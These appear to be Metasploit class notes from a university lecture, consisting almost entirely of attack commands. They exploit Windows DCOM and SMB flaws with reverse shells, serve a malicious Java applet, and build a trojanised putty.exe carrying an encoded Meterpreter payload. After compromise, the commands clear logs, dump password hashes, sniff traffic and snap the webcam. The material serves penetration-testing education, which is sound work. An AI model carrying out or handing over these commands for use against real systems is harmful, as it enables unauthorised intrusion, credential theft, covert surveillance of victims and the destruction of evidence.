This is a class we did to introduce students to Metasploit at IU Southeast.
Special guest lecturer Jeremy Druin (@webpwnize).
To follow along, I recommend downloading Kali Linux. Big thanks to http://www.offensive-security.com/ and please donate to http://www.hackersforcharity.org/

Notes:
Metasploit Notes 1
Show directory structure
cd /opt/metasploit/apps/pro/msf3
ls
cd modules
<tab it out>
cd /opt/metasploit/apps/pro/msf3
Updates
msfupdate
apt-get update;apt-get dist-upgrade
msfcli
msfcli exploits/windows/dcerpc/ms03_026_dcom O
msfcli exploits/windows/dcerpc/ms03_026_dcom P
msfcli exploits/windows/dcerpc/ms03_026_dcom rhost=TARGET-IP lhost=METASPLOIT-IP payload=windows/shell_reverse_tcp E
msfcli exploits/windows/dcerpc/ms03_026_dcom rhost=TARGET-IP E
msfconsole
service postgresql start
service metasploit start
update-rc.d postgresql enable
update-rc.d metasploit enable
help
?
ping irongeek.com
search ms08
use exploit/windows/smb/ms08_067_netapi
back
info exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
show options
set rhost TARGET-IP
exploit
run
active vs passive
use exploit/multi/browser/java_signed_applet
set lport 3456
set SRVPORT 3245
set lhost METASPLOIT-IP
set APPLETNAME "Adrians_funapp"
set CERTCN irongeek.com
set ENCODER x86/shikata_ga_nai
set payload windows/meterpreter/reverse_tcp
set uripath /
run
jobs
kill 0
Social Engineering Toolkit Way
setoolkit
1 2 1 2
no
METASPLOIT-IP
irongeek.com
2 3
445
Meterpreter
ls
sysinfo
shell
exit
help
help core
background
sessions -l
sessions -i 1
cd
pwd
cat
clearev #Clear logs
getsystem
ps
migrate 608
getuid
hashdump
load -l
load sniffer
sniffer_interfaces
sniffer_start 1
sniffer_stats 1
sniffer_dump 1 /root/my.pcap
sniffer_stop 1
screenshot
resource somefile
run vnc
Using a Scanner
msfconsole
db_status
workspace
hosts
use auxiliary/scanner/smb/smb_version
set rhosts TARGET-IP/24
set threads 100
run
hosts
Trojans
/etc/init.d/apache2 start
cd /var/www
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=METASPLOIT-IP LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -k -o /var/www/puttyx.exe
Or
msfvenom -p windows/meterpreter/reverse_tcp LHOST=METASPLOIT-IP LPORT=443 -x /var/www/putty.exe -e x86/shikata_ga_nai -i 15 -k -f exe >some.exe
(in msfconsole)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST METASPLOIT-IP
set LPORT 443
exploit
(run the exe, and show some other things)
webcam_list
webcam_snap 1
run webcam
Armitage as Metasploit GUI
service postgresql start
service metasploit start
armitage
(Based on http://www.offensive-security.com/metasploit-unleashed )
http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
Copyright 2020, IronGeek